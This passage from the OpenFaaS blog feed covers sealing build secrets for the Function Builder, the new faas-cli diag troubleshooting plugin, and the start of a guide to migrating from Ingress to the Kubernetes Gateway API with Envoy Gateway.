      <span class="na">pip_index_url</span><span class="pi">:</span> <span class="s">https://token:pypi-secret@my-org.jfrog.io/artifactory/api/pypi/python-local/simple</span>
</code></pre></div></div>

<p>Then in the template’s Dockerfile, you’d change the <code class="language-plaintext highlighter-rouge">pip install</code> line to mount the secret:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-RUN pip install --no-cache-dir --user -r requirements.txt
</span><span class="gi">+RUN --mount=type=secret,id=pip_index_url \
+    pip install --no-cache-dir --user \
+    --index-url "$(cat /run/secrets/pip_index_url)" \
+    -r requirements.txt
</span></code></pre></div></div>

<p>The same pattern works for npm, Go private modules, or any package manager that takes credentials at install time.</p>

<p>Binary values like CA certificates are also supported. You can seal them from files instead of literals:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret seal key.pub <span class="se">\</span>
  <span class="nt">--from-file</span> ca.crt<span class="o">=</span>./certs/internal-ca.crt <span class="se">\</span>
  <span class="nt">--from-literal</span> <span class="nv">pip_index_url</span><span class="o">=</span>https://token:secret@registry.example.com/simple
</code></pre></div></div>

<h2 id="sealing-secrets-for-ci-pipelines">Sealing secrets for CI pipelines</h2>

<p>If you’re integrating with a CI system rather than using <code class="language-plaintext highlighter-rouge">faas-cli publish</code> directly, you can seal secrets into a file ahead of time:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret seal key.pub <span class="se">\</span>
  <span class="nt">--from-literal</span> <span class="nv">api_key</span><span class="o">=</span>sk-live-my-secret-key
</code></pre></div></div>

<p>This writes <code class="language-plaintext highlighter-rouge">com.openfaas.secrets</code> in the current directory. Include it in the build tar alongside <code class="language-plaintext highlighter-rouge">com.openfaas.docker.config</code> and the <code class="language-plaintext highlighter-rouge">context/</code> folder, and the builder will pick it up.</p>

<p>You can inspect a sealed file without the builder:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret unseal key
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>api_key=sk-live-my-secret-key
</code></pre></div></div>

<h2 id="new-faas-cli-commands">New faas-cli commands</h2>

<p>We’ve added four new subcommands to <code class="language-plaintext highlighter-rouge">faas-cli secret</code>:</p>

<table>
  <thead>
    <tr>
      <th>Command</th>
      <th>Purpose</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">faas-cli secret keygen</code></td>
      <td>Generate a Curve25519 keypair</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">faas-cli secret generate</code></td>
      <td>Generate a random secret value for the pro-builder’s HMAC signing key</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">faas-cli secret seal key.pub --from-literal k=v</code></td>
      <td>Seal secrets into <code class="language-plaintext highlighter-rouge">com.openfaas.secrets</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">faas-cli secret unseal key</code></td>
      <td>Decrypt and inspect a sealed file (requires access to the private key)</td>
    </tr>
  </tbody>
</table>

<h2 id="wrapping-up">Wrapping up</h2>

<p>Build secrets for local builds and CI have been available for a while via <code class="language-plaintext highlighter-rouge">faas-cli pro build</code>. This feature brings the same capability to the Function Builder API, where builds happen in-cluster on behalf of third-party users and the secrets need to be protected over the wire.</p>

<p>We developed this together with <a href="https://waylay.io">Waylay</a> based on their production requirements, using NaCl box encryption to protect secrets over the wire. The <code class="language-plaintext highlighter-rouge">seal</code> package in the <a href="https://github.com/openfaas/go-sdk">Go SDK</a> is generic and could be reused for other use-cases in the future.</p>

<p>If you’re already using the Function Builder, you can start using build secrets by upgrading the helm chart and <code class="language-plaintext highlighter-rouge">faas-cli</code>. If you’re new to the builder, see the <a href="https://docs.openfaas.com/openfaas-pro/builder/">Function Builder API docs</a> for the full setup guide.</p>

<p>If you have questions, feel free to <a href="https://openfaas.com/pricing">reach out to us</a>.</p>

<h3 id="see-also">See also</h3>

<ul>
  <li><a href="https://docs.openfaas.com/openfaas-pro/builder/">Function Builder API docs</a></li>
  <li><a href="https://github.com/openfaas/go-sdk/tree/master/seal">Go SDK <code class="language-plaintext highlighter-rouge">seal</code> package</a></li>
  <li><a href="https://github.com/openfaas/faas-netes/tree/master/chart/pro-builder">Pro-builder Helm chart</a></li>
  <li><a href="https://www.openfaas.com/blog/building-functions-via-api-golang/">How to Build Functions with the Go SDK for OpenFaaS</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="kubernetes" /><category term="faas" /><category term="functions" /><category term="builder" /><category term="enterprise" /><summary type="html"><![CDATA[Learn how to pass private registry tokens and credentials into the Function Builder, encrypted end-to-end.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2026-03-build-secrets/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2026-03-build-secrets/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Introducing: Painless support and hands-off architecture reviews</title><link href="https://www.openfaas.com/blog/painless-support-with-diag/" rel="alternate" type="text/html" title="Introducing: Painless support and hands-off architecture reviews" /><published>2026-03-13T00:00:00+00:00</published><updated>2026-03-13T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/painless-support-with-diag</id><content type="html" xml:base="https://www.openfaas.com/blog/painless-support-with-diag/"><![CDATA[<p>Learn how the new <code class="language-plaintext highlighter-rouge">diag</code> plugin for faas-cli can be used to diagnose issues and make architecture reviews a hands-off exercise.</p>

<p>It helps you (or us together) to answer two questions: What’s breaking? Are we using OpenFaaS to its full potential?</p>

<p><img src="/images/2026-03-diag/e2e_flow.png" alt="End-to-end flow for faas-cli diag" /></p>

<blockquote>
  <p>Diag builds a HTML report, an instructions file for AI agents, graphs, and visualisations so you can explore the data and share if necessary, to get help. One command, no manual steps, nothing to forget.</p>
</blockquote>

<h2 id="two-case-studies">Two case-studies</h2>

<p><strong>Misconfiguration leads to an outage in production</strong></p>

<p>An enterprise customer using OpenFaaS for 3 years accidentally changed their gateway’s timeout to 0.5s from 2 hours.</p>

<blockquote>
  <p>An inadvertent change to values.yaml on the customer’s end enforced a half second timeout, causing functions to time-out unexpectedly. We requested a “diag” run, and within a 30 minutes had found the issue, advised the team, and got them up and running again.</p>
</blockquote>

<p><strong>It’s always DNS. Actually it was a bad node in EKS.</strong></p>

<p>A defense contractor in the US that uses OpenFaaS for building AI analytics software started to complain of timeouts and reliability issues in production.</p>

<blockquote>
  <p>We sent them the troubleshooting guide, and said “Can you try these?” After a couple of weeks, they’d not run any of the commands, so we went them specific commands - they ran these and shared the output. It was helpful, but we needed more.</p>

  <p>We then went down the route of trying to reproduce the issue locally, and couldn’t. We told the team to try HTTP readiness probes, which sometimes cure this kind of issue.</p>

  <p>Eventually, after sending commands back and forth over the course of a few days, they sent over a “diag” run.</p>

  <p>We saw network timeouts between core Pods like NATS, the Gateway and Prometheus. Even between containers in the same Pod. The insights helped them track it down to an EKS node that had “gone bad” and needed replacement.</p>
</blockquote>

<h2 id="two-main-uses-cases">Two main uses-cases</h2>

<p><strong>Self-service, and pain-free support</strong></p>

<p>When something goes wrong in production, the last thing you want is to be sent to a troubleshooting guide and told to run half a dozen commands. Your product is on fire. People are starting to point the finger of blame. You just want it fixed.</p>

<p>Everything that could be relevant is collected: deployments, function definitions, logs, events, pod status, and Prometheus metrics. Run it, send us the archive, and we can start working on your issue immediately, without a back-and-forth asking you to gather more data.</p>

<p><strong>Architecture review and Value extraction</strong></p>

<p>Beyond troubleshooting, the data and graphs collected by <code class="language-plaintext highlighter-rouge">faas-cli diag</code> can help you answer broader questions about your setup: are you getting the <em>most value possible</em> from the product? Is there an OpenFaaS feature that could help with your type of workload? Is there a production incident waiting to happen because something’s been mixed up in the <code class="language-plaintext highlighter-rouge">values.yaml</code>?</p>

<p>The report generated by diag gives you a starting point. You can inspect invocation rates, error rates, replica counts, and resource usage without needing to set up dashboards or port-forward to Prometheus.</p>

<p>Reviews no longer have to be annual ceremonies.</p>

<h2 id="what-does-it-collect">What does it collect?</h2>

<p>The diag tool gathers the following from your cluster:</p>

<ul>
  <li><strong>Deployment YAMLs</strong> — exported specs for OpenFaaS core components and functions</li>
  <li><strong>Function CRs</strong> — Custom Resource definitions for deployed functions</li>
  <li><strong>Kubernetes events</strong> — cluster events from the OpenFaaS and function namespaces</li>
  <li><strong>Pod status</strong> — output from <code class="language-plaintext highlighter-rouge">kubectl get</code> and <code class="language-plaintext highlighter-rouge">kubectl describe</code> for all relevant pods</li>
  <li><strong>Container logs</strong> — streamed via <a href="https://github.com/stern/stern">stern</a> for real-time and retrospective log collection</li>
  <li><strong>Node info</strong> — inventory and descriptions for all cluster nodes</li>
  <li><strong>Helm values</strong> — user-supplied values for the OpenFaaS Helm release</li>
  <li><strong>Ingress &amp; Gateway API</strong> — Ingress, IngressClass, HTTPRoute, and GatewayClass resources</li>
  <li><strong>Network Policies</strong> — NetworkPolicy resources from OpenFaaS and function namespaces</li>
  <li><strong>Prometheus metrics</strong> — metrics snapshots and visualisations covering replicas, request rates, latencies, and resource usage</li>
</ul>

<p>All collected data is written to a local directory and archived into a <code class="language-plaintext highlighter-rouge">.tar.gz</code> file for easy sharing. The tool is 100% offline — no information is shared with anyone, including OpenFaaS Ltd, by default.</p>

<h2 id="install-the-diag-plugin">Install the diag plugin</h2>

<p>Install the plugin, and check the version. It’s useful to run this command before very run - because we’re actively improving the tool as we get feedback.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli plugin get diag
faas-cli diag version
</code></pre></div></div>

<h2 id="generate-a-report">Generate a report</h2>

<p>By default, <code class="language-plaintext highlighter-rouge">diag</code> reads configuration from <code class="language-plaintext highlighter-rouge">diag.yaml</code> in your current directory. Generate that file first, then run the tool:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Generate a `diag.yaml` config file</span>
faas-cli diag config simple <span class="o">&gt;</span> diag.yaml

<span class="c"># Run diagnostics</span>
faas-cli diag
</code></pre></div></div>

<p>The first command creates a <code class="language-plaintext highlighter-rouge">diag.yaml</code> with sensible defaults that works for most setups. The second starts the collection: it sets up port-forwards, streams logs, collects Kubernetes resources, and scrapes Prometheus metrics. Press <code class="language-plaintext highlighter-rouge">Control+C</code> once to stop gracefully, it will finish collecting and write all output to disk.</p>

<p><strong>Staging and production</strong></p>

<p>Here’s how you could collect data from both production and staging:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> ~/diag
<span class="nb">cd</span> ~/diag

<span class="c"># Generate an initial config:</span>
faas-cli diag config simple <span class="o">&gt;</span> diag.yaml

kubectl config use-context eks-staging-us-east-1
faas-cli diag <span class="s2">"staging"</span>

kubectl config use-context eks-prod-us-east-1
faas-cli diag <span class="s2">"prod"</span>
</code></pre></div></div>

<p>For more advanced options like targeting specific functions or using an external Prometheus instance, see the <a href="#appendix-full-configuration-reference">full configuration reference</a> at the end of this post.</p>

<p><strong>Running at scale with hundreds of namespaces</strong></p>

<p>If you’re running a multi-tenant setup with hundreds of function namespaces, you probably don’t want to collect from all of them at once. Use the <code class="language-plaintext highlighter-rouge">--namespace</code> flag to target a specific subset:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli diag config simple <span class="nt">--namespace</span> tenant-1 <span class="nt">--namespace</span> tenant-2
</code></pre></div></div>

<p>Or use <code class="language-plaintext highlighter-rouge">'*'</code> to automatically discover all OpenFaaS function namespaces:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli diag config simple <span class="nt">--namespace</span> <span class="s1">'*'</span>
</code></pre></div></div>

<script src="https://asciinema.org/a/tsVGRdQhWh7p32hp.js" id="asciicast-tsVGRdQhWh7p32hp" async="true" data-autoplay="true" data-loop="true"></script>

<h2 id="exploring-the-report">Exploring the report</h2>

<p>Data is saved to <code class="language-plaintext highlighter-rouge">./run</code> - either with a date and timestamp, or with the name of the run you passed.</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">diag "prod"</code> creates <code class="language-plaintext highlighter-rouge">./run/diag/</code></li>
  <li><code class="language-plaintext highlighter-rouge">diag</code> on its own creates i.e. <code class="language-plaintext highlighter-rouge">./run/2026-03-10_14-30-00/</code></li>
</ul>

<p>To explore the data, you can open the <code class="language-plaintext highlighter-rouge">index.html</code> file in those folders.</p>

<p>The report includes visualisations of Prometheus metrics such as function invocation rates, error rates, and replica counts, giving you a quick overview of cluster health without needing to set up Grafana or port-forward to Prometheus yourself.</p>

<p><img src="/images/2026-03-diag/report-summary.png" alt="The report summary page with quick links to metrics, CRDs, pods, events, and logs per namespace." /></p>
<blockquote>
  <p>The report summary page with quick links to metrics, CRDs, pods, events, and logs per namespace.</p>
</blockquote>

<p><img src="/images/2026-03-diag/report-metrics-dashboard.png" alt="The metrics dashboard showing function replicas, request rates by status code, and execution duration." /></p>
<blockquote>
  <p>The metrics dashboard showing function replicas, request rates by status code, and execution duration.</p>
</blockquote>

<p><strong>Diag is AI ready</strong></p>

<p>The output also includes an <code class="language-plaintext highlighter-rouge">AGENTS.md</code> file that instructs AI coding agents like Claude Code, Codex, and similar tools to interpret and diagnose issues from the collected data. This gives you a fast first pass for support investigations or architecture reviews using AI, while keeping the decision loop with your team.</p>

<p>But before you load up Claude Code, Codex, or Gemini, make sure that your organisation has any of the following:</p>

<ul>
  <li>A zero-data retention agreement with your inference provider.</li>
  <li>Your own private deploymeny of a model to Azure/AWS/Google etc, with approved data policies.</li>
  <li>Or access to private, airgapped local GPUs and AI models.</li>
  <li>Have redacted all credentials, tokens, customer identifiers or confidential information</li>
</ul>

<p>If in doubt, do not use any form of AI with the output, most issues can be found by humans on your end or ours.</p>

<h2 id="useful-flags-and-options">Useful flags and options</h2>

<table>
  <thead>
    <tr>
      <th>Flag / Command</th>
      <th>Description</th>
      <th>Example</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">-d/--duration</code></td>
      <td>Auto-stop after a set duration</td>
      <td><code class="language-plaintext highlighter-rouge">faas-cli diag -d 5m</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">--age</code></td>
      <td>Collect logs from a past time window</td>
      <td><code class="language-plaintext highlighter-rouge">faas-cli diag --age 1h</code></td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">diag [run-name]</code></td>
      <td>Custom name for the run (positional argument)</td>
      <td><code class="language-plaintext highlighter-rouge">faas-cli diag incident-456</code></td>
    </tr>
  </tbody>
</table>

<h2 id="wrapping-up">Wrapping up</h2>

<p>The new <code class="language-plaintext highlighter-rouge">faas-cli diag</code> plugin gives you a fast, repeatable way to collect everything needed for support requests and architecture reviews. Instead of manually running a dozen <code class="language-plaintext highlighter-rouge">kubectl</code> commands, you get a single workflow that captures logs, events, pod status, and metrics — all archived and ready to share.</p>

<p>Whether you’re debugging an incident or reviewing your cluster setup, the workflow is the same: run <code class="language-plaintext highlighter-rouge">faas-cli diag</code> and explore the report. If you need our help, send us the archive.</p>

<p>For more details, see the <a href="https://docs.openfaas.com/deployment/troubleshooting/">Troubleshooting docs</a>.</p>

<h2 id="appendix-full-configuration-reference">Appendix: full configuration reference</h2>

<p>Generate the full configuration template with:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli diag config full
</code></pre></div></div>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Identify the cluster and kubectl context</span>
<span class="na">clusterName</span><span class="pi">:</span> <span class="s2">"</span><span class="s">production-cluster"</span>
<span class="na">context</span><span class="pi">:</span> <span class="s2">"</span><span class="s">"</span>  <span class="c1"># Leave empty to use current context</span>

<span class="c1"># Namespaces to collect from</span>
<span class="na">namespaces</span><span class="pi">:</span>
  <span class="na">openfaas</span><span class="pi">:</span> <span class="s">openfaas</span>
  <span class="na">functions</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="s">openfaas-fn</span>
    <span class="pi">-</span> <span class="s">staging-fn</span>
    <span class="pi">-</span> <span class="s">production-fn</span>

<span class="c1"># Function filter patterns (glob-style)</span>
<span class="na">functions</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s1">'</span><span class="s">api-*'</span>
  <span class="pi">-</span> <span class="s1">'</span><span class="s">webhook-*'</span>

<span class="c1"># Prometheus configuration</span>
<span class="na">prometheus</span><span class="pi">:</span>
  <span class="na">enabled</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">service</span><span class="pi">:</span> <span class="s">prometheus</span>
  <span class="na">targetPort</span><span class="pi">:</span> <span class="m">9090</span>
  <span class="c1"># Use a custom URL if Prometheus is outside the openfaas namespace</span>
  <span class="c1"># url: "http://prometheus.monitoring.svc.cluster.local:9090"</span>

<span class="c1"># Gateway configuration</span>
<span class="na">gateway</span><span class="pi">:</span>
  <span class="na">enabled</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">service</span><span class="pi">:</span> <span class="s">gateway</span>
  <span class="na">targetPort</span><span class="pi">:</span> <span class="m">8080</span>
  <span class="na">autoAuth</span><span class="pi">:</span> <span class="no">true</span>

<span class="c1"># What to collect</span>
<span class="na">collection</span><span class="pi">:</span>
  <span class="na">deployments</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">functionCRs</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">events</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">podStatus</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">logs</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">metrics</span><span class="pi">:</span> <span class="no">true</span>
  <span class="na">logAge</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1h"</span>

<span class="c1"># Output directory and run name</span>
<span class="na">output</span><span class="pi">:</span>
  <span class="na">directory</span><span class="pi">:</span> <span class="s2">"</span><span class="s">./run"</span>
  <span class="c1"># runName: "incident-123"</span>
</code></pre></div></div>

<p>A few options worth noting:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">context</code> - lets you target a specific kubectl context if you manage multiple clusters. Leave it empty to use whichever context is currently active.</li>
  <li><code class="language-plaintext highlighter-rouge">functions</code> - uses glob patterns to filter which functions are collected. Use <code class="language-plaintext highlighter-rouge">'*'</code> for all, or patterns like <code class="language-plaintext highlighter-rouge">'api-*'</code> to narrow the scope on large clusters.</li>
  <li><code class="language-plaintext highlighter-rouge">prometheus.url</code> - lets you point to an external Prometheus instance, bypassing the automatic port-forward.</li>
  <li><code class="language-plaintext highlighter-rouge">collection</code> - toggles to disable individual collectors if you only need a subset of the data.</li>
  <li><code class="language-plaintext highlighter-rouge">logAge</code> - controls how far back to collect logs retrospectively. Leave it empty to collect all available logs.</li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="kubernetes" /><category term="troubleshooting" /><category term="openfaas-pro" /><summary type="html"><![CDATA[Run one command to collect an OpenFaaS cluster report: logs, resources, events, and metrics that you can share for quick help]]></summary></entry><entry><title type="html">How to Migrate OpenFaaS to Gateway API</title><link href="https://www.openfaas.com/blog/gateway-api-migration/" rel="alternate" type="text/html" title="How to Migrate OpenFaaS to Gateway API" /><published>2026-02-13T00:00:00+00:00</published><updated>2026-02-13T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/gateway-api-migration</id><content type="html" xml:base="https://www.openfaas.com/blog/gateway-api-migration/"><![CDATA[<p>In this post we’ll walk through the current options for getting traffic into OpenFaaS on Kubernetes, the latest Gateway API, and how to migrate from Ingress.</p>

<p>Table of contents:</p>

<ul>
  <li><a href="#preamble-the-unfortunate-double-whammy">Preamble: The unfortunate double-whammy</a></li>
  <li><a href="#introduction-to-gateway-api">Introduction to Gateway API</a></li>
  <li><a href="#prerequisites">Prerequisites</a></li>
  <li><a href="#check-and-update-gateway-api-crds">Check and update Gateway API CRDs</a></li>
  <li><a href="#install-a-gateway-api-implementation">Install a Gateway API Implementation</a></li>
  <li><a href="#install-cert-manager">Install cert-manager</a></li>
  <li><a href="#create-a-cert-manager-issuer">Create a cert-manager Issuer</a></li>
  <li><a href="#expose-the-openfaas-gateway-with-tls">Expose the OpenFaaS gateway with TLS</a></li>
  <li><a href="#add-the-openfaas-dashboard">Add the OpenFaaS dashboard</a></li>
  <li><a href="#final-thoughts-and-next-steps">Final thoughts and next steps</a></li>
</ul>

<h2 id="preamble-the-unfortunate-double-whammy">Preamble: The unfortunate double-whammy</h2>

<p>For as long as we can remember, Ingress has been the de facto standard for exposing HTTP services from Kubernetes clusters. It has always had a very simple syntax, and has only gone through one major change, graduating from <code class="language-plaintext highlighter-rouge">extensions/v1beta1</code> to <code class="language-plaintext highlighter-rouge">networking.k8s.io/v1</code> in Kubernetes 1.19 (around 2019). The key change was the introduction of the <code class="language-plaintext highlighter-rouge">pathType</code> field for precise path matching and the <code class="language-plaintext highlighter-rouge">IngressClass</code> (instead of annotations) resource for consistent controller configuration.</p>

<p>Honestly, we don’t need to explain how Ingress works, it’s so well understood and widely used.</p>

<p>But there was a glint in the eyes of the Kubernetes maintainers, and they wanted to provide something that was much more ambitious in its scope, that addressed needs that OpenFaaS customers don’t tend to have. The <a href="https://istio.io/">Istio service mesh</a> was a precursor for this, with its own set of add-ons with similar names, and was eventually crystallised into the <em>Gateway API</em>.</p>

<p>Most OpenFaaS and Inlets customers we’ve encountered have been using Ingress (many moved away from Istio and service meshes) preferring simplicity and ease of use. They tended to always be using the <a href="https://kubernetes.github.io/ingress-nginx/">ingress-nginx</a> controller. A brief history: Ingress Nginx started off as a hobby project for a single maintainer, who was unable to find corporate sponsorship or support from the CNCF, and had to give it up in 2019. Shortly after 2-3 maintainers stepped up and ran it reasonably well as a spare-time project, but without sustainable backing as part of a day job, the same thing started to happen again. Issues were being reported, quicker than they could be fixed.</p>

<p>So the Kubernetes maintainers made a judgement call, they decided to announce project would be officially mothballed in March 2026. No further updates, or security patches. That’s a big deal.</p>

<p><strong>Why is this a double whammy?</strong></p>

<p>The announcement had some choice words: “if you must continue to use Ingress” - sounds a bit like you’re in the wrong if you are using something that fits your needs. It has an undertone of Ingress being a legacy or inappropriate solution, potentially something that may eventually go the way of ingress-nginx. We focus on simple solutions that work well for our users, however, reading between the lines, we want to make sure you’re prepared for the future.</p>

<p><strong>So if we’re pragmatic, we have a couple of options:</strong></p>

<ol>
  <li>try to move to an Ingress Controller like Traefik which can support some of the behaviours and settings of Ingress Nginx,</li>
  <li>or move to Gateway API (the developing, but approved future standard).</li>
</ol>

<p>Rather than installing one chart, and creating a basic Ingress resource, and adding 1-2 annotations, we have a much more varied path. Gateway API intends to provide an agnostic overlay, shying away from annotations as extensions, and focusing on a new set of decoupled API objects.</p>

<p><strong>It’s only a bit of YAML, how hard could it be?</strong></p>

<p>For OpenFaaS customers, we’re trying to make this transition as simple as possible, starting with this guide that converts YAML for like for like. But one of our other products <a href="https://docs.inlets.dev/uplink/">Inlets Uplink</a> integrates ingress-nginx much more deeply and relies on its annotations, that is going to be significantly more work both for the controller itself, and for users needing to upgrade.</p>

<p><strong>Gateways everywhere</strong></p>

<p>The core of OpenFaaS is the OpenFaaS Gateway. This was created in 2016 and has nothing to do with the Gateway API for Kubernetes. Unfortunately, the terms are overloaded, so many of you will end up with “openfaas-gateway” (Gateway API object) and a “gateway” (Service object for the OpenFaaS Gateway), and both may well be in the OpenFaaS namespace.</p>

<p>We’re sorry, there’s not much we could do about this, but if you can think of a better name or a more descriptive term, we would appreciate your input.</p>

<h2 id="introduction-to-gateway-api">Introduction to Gateway API</h2>

<p><a href="https://gateway-api.sigs.k8s.io/">Kubernetes Gateway API</a> is an add-on to Kubernetes, which:</p>

<ul>
  <li>Aims to abstract vendor implementations under one set of APIs</li>
  <li>Acts as an add-on, rather than a native feature</li>
  <li>Attempts to split the roles of cluster administrator and application developer through different resources.</li>
  <li>Covers the main use-cases of Ingress Controllers, such as TLS termination, path-based routing, and load balancing.</li>
</ul>

<p>From the perspective of OpenFaaS, there are three Gateway API resources we need:</p>

<ul>
  <li><strong>GatewayClass</strong> - maps to IngressClass - i.e. whether you’re using Kgateway, Istio, Envoy Gateway, or another implementation.</li>
  <li><strong>Gateway</strong> - maps to a LoadBalancer Service with one or more listeners and handles TLS configuration.</li>
  <li><strong>HTTPRoute</strong> - binds paths and/or hostnames to backend services.</li>
</ul>

<p>This separation means that a cluster operator can manage TLS termination and listener configuration in a Gateway, while application teams define routing via HTTPRoute resources. It also means that the same configuration works across <a href="https://gateway-api.sigs.k8s.io/implementations/#conformant">many conformant implementations</a> including Envoy Gateway, Traefik, NGINX Gateway Fabric, and Istio.</p>

<p>The <code class="language-plaintext highlighter-rouge">openfaas</code> chart has built-in support to generate Ingress objects. Once we have enough feedback from customers, we’ll know if and how you want us to add support for Gateway API resources into the chart. For now, this guide shows how to create the resources through manual YAML files, which we think is more useful for building understanding.</p>

<p>We’ll: Install a Gateway API implementation, configure cert-manager, and define a Gateway and HTTPRoute both the OpenFaaS Gateway and Dashboard.</p>

<p>For any of the YAML examples, you can either create a file, and run <code class="language-plaintext highlighter-rouge">kubectl apply -f ./name.yaml</code> or <code class="language-plaintext highlighter-rouge">kubectl apply -f -</code> then paste in the snippet directly and hit enter then Control + D.</p>

<h2 id="prerequisites">Prerequisites</h2>

<ul>
  <li>A Kubernetes cluster with OpenFaaS installed via Helm</li>
  <li>A domain name with the ability to create DNS records</li>
  <li>A public IP address or load balancer (i.e. EKS, GKE, or AKS), or <a href="https://github.com/inlets/inlets-operator">inlets-operator</a> which does the same for any private or NAT’d or firewalled Kubernetes cluster</li>
</ul>

<h2 id="check-and-update-gateway-api-crds">Check and update Gateway API CRDs</h2>

<p>Some Kubernetes distributions ship their own version of the Gateway API CRDs, which may not match those your implementation wants to use.</p>

<p>Check with:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>kubectl get crd | <span class="nb">grep </span>gateway.networking.k8s.io

backendtlspolicies.gateway.networking.k8s.io          2026-02-13T15:06:49Z
gatewayclasses.gateway.networking.k8s.io              2026-02-13T15:06:49Z
gateways.gateway.networking.k8s.io                    2026-02-13T15:06:49Z
grpcroutes.gateway.networking.k8s.io                  2026-02-13T15:06:49Z
httproutes.gateway.networking.k8s.io                  2026-02-13T15:06:49Z
referencegrants.gateway.networking.k8s.io             2026-02-13T15:06:49Z
tcproutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z
tlsroutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z
udproutes.gateway.networking.k8s.io                   2026-02-13T15:07:31Z
</code></pre></div></div>

<p>For this example, it’s best to let Envoy Gateway handle the CRD installation with versions it supports, so remove all CRDs that may be preloaded in your cluster:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># example: replace v1.1.0 with the version you want</span>
kubectl delete <span class="nt">-f</span> https://github.com/kubernetes-sigs/gateway-api/releases/download/v1.1.0/standard-install.yaml
kubectl delete <span class="nt">-f</span> https://github.com/kubernetes-sigs/gateway-api/releases/download/v1.1.0/experimental-install.yaml
</code></pre></div></div>

<h2 id="install-a-gateway-api-implementation">Install a Gateway API Implementation</h2>

<p>Early feedback from customers suggests that <a href="https://gateway.envoyproxy.io/">Envoy Gateway</a> may well end-up being the equivalent of “ingress-nginx” in the Gateway API world. It is one of the many <a href="https://gateway-api.sigs.k8s.io/implementations/#conformant">conformant implementations</a>.</p>

<blockquote>
  <p><code class="language-plaintext highlighter-rouge">gatewayClassName</code> is similar to the old <code class="language-plaintext highlighter-rouge">ingressClassName</code> in the Ingress API. It is a string that identifies the Gateway API implementation that should be used to manage the Gateway and HTTPRoute resources. So if you want to use a different implementation, just change the <code class="language-plaintext highlighter-rouge">gatewayClassName</code> in any examples and install it using its documentation, instead of that of Envoy Gateway.</p>

  <p>Watch out for this gotcha: many tools such as cert-manager, may require additional settings or flags to turn on Gateway API support.</p>
</blockquote>

<p>Install Envoy Gateway using <a href="https://gateway.envoyproxy.io/docs/install/install-helm/#install-with-helm">its Helm chart</a>. The chart includes the Gateway API CRDs, so no separate CRD installation is needed.</p>

<p>Bear in mind that Envoy Gateway maintains its own <a href="https://gateway.envoyproxy.io/news/releases/matrix/">compatibility matrix</a>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm <span class="nb">install </span>eg oci://docker.io/envoyproxy/gateway-helm <span class="se">\</span>
  <span class="nt">--version</span> v1.7.0 <span class="se">\</span>
  <span class="nt">-n</span> envoy-gateway-system <span class="se">\</span>
  <span class="nt">--create-namespace</span>
</code></pre></div></div>

<p>Since this post will be valid for quite some time, you can find alternative versions of the chart by running <code class="language-plaintext highlighter-rouge">arkade get crane</code>, then <code class="language-plaintext highlighter-rouge">crane ls envoyproxy/gateway-helm</code>. See also: <a href="https://github.com/alexellis/arkade">arkade</a>.</p>

<p>Wait for Envoy Gateway to become available:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl <span class="nb">wait</span> <span class="nt">--timeout</span><span class="o">=</span>5m <span class="nt">-n</span> envoy-gateway-system <span class="se">\</span>
  deployment/envoy-gateway <span class="nt">--for</span><span class="o">=</span><span class="nv">condition</span><span class="o">=</span>Available
</code></pre></div></div>

<p>Create a <code class="language-plaintext highlighter-rouge">GatewayClass</code> so that <code class="language-plaintext highlighter-rouge">Gateway</code> resources can reference the Envoy Gateway controller, the usual name is <code class="language-plaintext highlighter-rouge">eg</code> short for Envoy Gateway.</p>

